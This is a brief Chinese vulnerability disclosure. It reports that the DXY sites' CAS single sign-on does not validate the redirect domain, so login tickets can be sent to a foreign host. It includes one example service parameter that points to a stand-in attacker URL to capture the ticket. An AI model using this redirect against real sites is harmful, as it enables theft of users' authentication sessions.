CAS登录跳转未做验证,导致认证信息泄露


详细说明:

丁香园系列站点使用CAS做SSO。CAS的登录跳转没有验证是否跨未校验域。例如:
?service=http://hack.com/getTicket.php
用户登录后跳转到:
?ticket=***********************